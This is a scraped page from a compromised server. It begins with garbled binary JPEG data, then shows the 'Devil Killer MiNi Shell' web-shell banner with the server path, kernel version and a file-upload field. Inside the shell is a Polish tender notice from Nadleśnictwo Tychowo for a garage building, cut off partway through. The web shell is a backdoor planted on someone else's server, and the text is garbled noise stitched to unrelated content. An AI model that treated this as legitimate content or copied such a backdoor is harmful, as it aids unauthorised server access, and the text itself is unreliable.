JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230508/0020591301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Budowa budynku gospodarczo-garażowego dla zaplecza technicznego Nadleśnictwa Tychowo&#34;. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO TYCHOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330044329</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bobolicka 86</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tychowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">943115201</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">tychowo@szczecinek.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://tychowo.szczecinek.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Budowa budynku gospodarczo-garażowego dla zaplecza technicznego Nadleśnictwa Tychowo&#34;. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d1f12f3f-ed7e-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00205913</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadlesnictwo-tychowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Dedykowana platforma zakupowa do obsługi komunikacji w formie elektronicznej pomiędzy Zamawiającym a wykonawcami oraz składania oferty: https://portal.smartpzp.pl/nadlesnictwo-tychowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a<br/>Wykonawcami odbywa się przy użyciu Platformy SmartPZP ( „Platforma”), a także za pośrednictwem poczty elektronicznej na adres:<br/>tychowo@szczecinek.lasy.gov.pl. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane przy użyciu<br/>Platformy SmatPZP przekazywane są w formie elektronicznej, w zakładce „Korespondencja”.Sposób sporządzenia i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452). Za datę wpływu oświadczeń, ofert, wniosków,<br/>zaświadczeń oraz informacji przyjmuje się datę ich przekazania do Platformy. Aktualny data i godzina, zsynchronizowane z<br/>Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu Platformy.W celu skorzystania z Platformy konieczna jest<br/>rejestracja Wykonawcy pod adresem: https://portal.smartpzp.pl/nadlesnictwo-tychowo po kliknięciu na przycisk „Załóż konto”.<br/>Wykonawca rejestrując się akceptuje warunki korzystania z Platformy, określone w Regulaminie podczas rejestracji oraz uznaje go<br/>za wiążący. Korzystanie z Platformy jest bezpłatne. Podgląd i pobieranie dokumentacji postępowania nie wymaga<br/>logowania.Zamawiający informuje, że Platforma jest kompatybilna ze wszystkimi podpisami elektronicznymi. Do przesłania<br/>dokumentów i złożenia oferty nie jest niezbędne posiadanie certyfikatu kwalifikowanego. Szczegółowe informacje o sposobie<br/>pozyskania usługi kwalifikowanego podpisu elektronicznego oraz warunkach jej użycia można znaleźć na stronach internetowych<br/>kwalifikowanych dostawców usług zaufania, których lista znajduje się pod adresem internetowym: http://www.nccert.pl/kontakt.htm<br/>Szczegółowe informacje o sposobie pozyskania usługi profilu zaufanego można znaleźć pod adresem internetowym:<br/>https://www.gov.pl/web/gov/zaloz-profil-zaufany<br/>Szczegółowe informacje o sposobie pozyskania podpisu osobistego można znaleźć pod adresem internetowym:<br/>https://www.gov.pl/web/e-dowod/podpis-osobisty.Minimalne wymagania techniczne dotyczące korzystania z Platformy:a) przesyłane<br/>dokumenty powinny być załączone w formie plików w formacie odpowiednio . png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx,<br/>.odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg, b) wymagania sprzętowe dla Wykonawcy:<br/> przeglądarka internetowa Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58 i późniejsze,<br/>Microsoft Edge ver 18 i późniejsze, Internet Explorer 11 lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla<br/>Firefox, Opera. Zalecane jest używanie najnowszych wersji przeglądarek, system operacyjny Windows 7 i późniejsze, zainstalowane<br/>środowisko Java w wersji min. 1.8 (jre),w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do<br/>przeglądarki Szafir SDK Web, oprogramowanie SzafirHost w systemie operacyjnym,stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 1 Mb/s,komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor<br/>1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich nowsze<br/>wersje,zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów .pdf.<br/>Pozostałe wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy,<br/>który stanowi załącznik nr 13 do SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Do art.13 ust.1 i 2 rozporządzenia PEiR(UE)2016/679 z dnia27.04.2016 r.(Dz.Urz.UE<br/>L119 z 04.05.2016r.,str.1–„RODO”)Administratorem danych osobowych jest Nadleśnictwo Tychowo ul. Bobolicka 86,78-220<br/>Tychowo,adres e-mail:tychowo@szczecinek.lasy.gov.pl.Kontakt z inspektorem e-mail iod@comp-net.pl.Inspektor ODO p.Marcelina<br/>Goryńska.Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w<br/>sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.Zamawiający udostępnia dane osobowe,o których<br/>mowa w art.10RODO w celu umożliwienia korzystania ze środków ochrony prawnej,o których mowa w dziale IX PZP,do upływu<br/>terminu do<br/>ich wniesienia.Do przetwarzania danych osobowych,o których mowa w art.10 RODO mogą być dopuszczone wyłącznie osoby<br/>posiadające upoważnienie.Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w<br/>poufności.Dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit.c RODO w celu związanym z prowadzeniem niniejszego<br/>określone w art.255-256PZP–w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji,a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.Odbiorcami danych osobowych będą osoby lub<br/>podmioty,którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP.Dane osobowe pozyskane w<br/>związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane,zgodnie z<br/>art.78ust.1 PZP, przez okres4lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego,a jeżeli czas trwania<br/>umowy przekracza4lata,okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.Niezależnie w przypadku zawarcia umowy w sprawie zamówienia publicznego,dane osobowe będą przetwarzane do upływu okresu<br/>przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.Dane osobowe pozyskane w związku z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi<br/>doradcze,w tym usługi prawne,i konsultingowe,Stosownie do art.22RODO,decyzje dotyczące danych osobowych nie będą<br/>podejmowane w sposób zautomatyzowany.Osoba,której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania<br/>dane osobowe,ma prawo:dostępu do swoich danych osobowych–zgodnie z art.15RODO,przy czym w sytuacji,gdy wykonanie<br/>obowiązków,o których mowa w art.15 ust.1-3ODO wymagałoby niewspółmiernie dużego wysiłku Zamawiający może żądać<br/>wskazania dodatkowych informacji mających na celu sprecyzowanie żądania,w szczególności podania nazwy lub daty bieżącego<br/>bądź zakończonego postępowania o udzielenie zamówienia publicznego;do sprostowana swoich danych osobowych–zgodnie z<br/>art.16RODO,przy czym skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych,o którym mowa w<br/>art.16RODO,nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego,ani zmianą postanowień<br/>umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego załączników;do żądania<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków,o których mowa w art.18ust.2RODO,prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,lub z uwagi na ważne względy interesu publicznego UE<br/>lub państwa członkowskiego;prawo to nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego;wniesienia skargi do Prezesa UODO w przypadku uznania,iż przetwarzanie jej danych<br/>osobowych narusza przepisy o ochronie danych osobowych, przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">osoba,której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania<br/>dane osobowe,ma prawo:<br/>1)dostępu do swoich danych osobowych – zgodnie z art.15 RODO, przy czym w sytuacji,gdy wykonanie obowiązków,o których<br/>mowa w art.15 ust.1 -3 RODO wymagałoby niewspółmiernie dużego wysiłku Zamawiający może żądać wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego<br/>postępowania o udzielenie zamówienia publicznego;<br/>2)do sprostowana swoich danych osobowych – zgodnie z art.16RODO, przy czym skorzystanie z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o którym mowa w art. 16RODO,nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego,ani zmianą postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności<br/>protokołu oraz jego załączników;<br/>3)do żądania od Zamawiającego – jako administratora,ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków,o których mowa w art.18 ust.2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej,lub z uwagi na ważne względy interesu publicznego UE lub państwa członkowskiego;prawo to nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>4)wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania,iż przetwarzanie jej danych osobowych<br/>narusza przepisy o ochronie danych osobowych,w tym przepisy RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.8.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 484011,52 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa budynku gospodarczo-garażowego dla zaplecza technicznego przy siedzibie<br/>Nadleśnictwa Tychowo.<br/>Na powyższe zadanie został sporządzony projekt budowlany, który Starosta Białogardzki decyzją nr 036/23 z dnia<br/>22.03.2023 r. zatwierdził i udzielił pozwolenia na budowę.<br/>Zakres zadania inwestycyjnego obejmuje w szczególności:<br/>Rodzaj i kategoria obiektu budowlanego będącego przedmiotem zamierzenia budowlanego – budynek jednokondygnacyjny<br/>– parterowy, wolnostojący.<br/>Zaprojektowano obiekt parterowy, jednokondygnacyjny na rzucie prostokąta wraz z przylegającą wiatą .<br/>Elewacja wykończona tynkiem strukturalnym gładkim, cienkowarstwowym mineralnym, malowanym farbą silikonową w<br/>kolorach zbliżonych do kolorów budynku głównego Nadleśnictwa Tychowo.<br/>Pokrycie - dach, dwuspadowy o nachyleniu 30°, pokrytym blachodachówką w kolorze ceglanym.<br/>Charakterystyczne parametry obiektu budowlanego:<br/>Podstawowe parametry: Projektowany budynek to obiekt wolnostojący, niski, jednokondygnacyjny o łącznej powierzchni użytkowej (wewnętrznej)<br/>wynoszącej 168,22 [m2]. Kubatura brutto obiektu wyniesie 866,62 [m3]. Główną część obiektu – jego powierzchni użytkowej<br/>zajmują trzy stanowiska postojowe dla samochodów technicznych Nadleśnictwa Tychowo, tj. 84,75 [m2], co stanowi około<br/>50 [%] ogólnej powierzchni użytkowej.<br/>Pozostałe pomieszczenia będą przeznaczone na cele gospodarcze (dla potrzeb składowania narzędzi, innych materiałów<br/>niepalnych, etc.) oraz pomieszczenie na sprzęt p.poż.<br/>Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 2 i 3 do SWZ obejmujący:<br/>a) dokumentację projektową tj. projekt techniczny i architektoniczno-budowlany– załącznik nr 2;<br/>b) specyfikację techniczną wykonania i odbioru robót budowlanych – załącznik nr 2;<br/>c) przedmiar robót – załącznik nr 3.<br/>Przedmiar nie stanowi wyłącznej podstawy do wyceny ofert.<br/>Miejscem realizacji przedmiotu zamówienia jest obszar administracyjny Nadleśnictwa Tychowo, działka nr 722<br/>Województwo Zachodniopomorskie, powiat białogardzki, gmina Tychowo, obręb geodezyjny 0001 Tychowo. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) Cena – 60 %<br/>2) Okres gwarancji – 40 %<br/>Sposób obliczania punktów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x100 pkt x 60 %<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie (załącznik nr 1 do SWZ). Z uwagi na<br/>postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku<br/>podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej<br/>w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium „Okres gwarancji” oceniany będzie okres gwarancji na wykonane roboty budowlane licząc od dnia odbioru<br/>końcowego Przedmiotu Umowy.<br/>W ramach kryterium „Okres gwarancji” ocena ofert zostanie dokonana w następujący sposób:<br/> oferta z gwarancją 36 miesięcy – 0 pkt.<br/> oferta z gwarancją 48 miesięcy – 10 pkt.<br/> oferta z gwarancją 60 miesięcy – 20 pkt.<br/> oferta z gwarancją 72 miesięcy – 30 pkt.<br/> oferta z gwarancją 84 i więcej miesięcy – 40 pkt.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego dot. okresu gwarancji w formularzu oferty (załącznik<br/>nr 1 do SWZ). W przypadku braku wskazania przez Wykonawcę okresu gwarancji, uznaje się, że Wykonawca przyjmuje okres<br/>gwarancji najkrótszy (36 miesiące) i otrzymuje 0 pkt w ramach niniejszego kryterium oceny ofert. W przypadku wskazania przez<br/>Wykonawcę okresu gwarancji krótszego niż 36 miesiące oferta podlega odrzuceniu jako niezgodna z SWZ. Wykonawca powinien<br/>zaoferować okres gwarancji w pełnych okresach i miesiącach tj.: 36, 48, 60, 72 i 84 (i więcej) miesięcy.<br/>Za najkorzystniejszą ofertę uznana zostanie Oferta wykonawcy, która uzyska największą liczbę punktów obliczoną wg następującego<br/>wzoru:<br/>P= C+G<br/>gdzie:<br/>P - łączna liczba punktów jaką uzyskała oceniana oferta,<br/>C - liczba punktów przyznanych ocenianej ofercie w ramach kryterium: Cena,<br/>G - liczba punktów przyznanych ocenianej ofercie w kryterium: Okres gwarancji.<br/>15.4. Za najkorzystniejszą ofertę uznana zostanie Oferta Wykonawcy, która uzyska największą sumę punktów uzyskanych w/w<br/>kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punków.<br/>15.5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i<br/>innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o<br/>najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze tj. Zamawiający wybiera ofertę z<br/>najniższą ceną. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim, Zamawiający wzywa<br/>Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających<br/>nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do 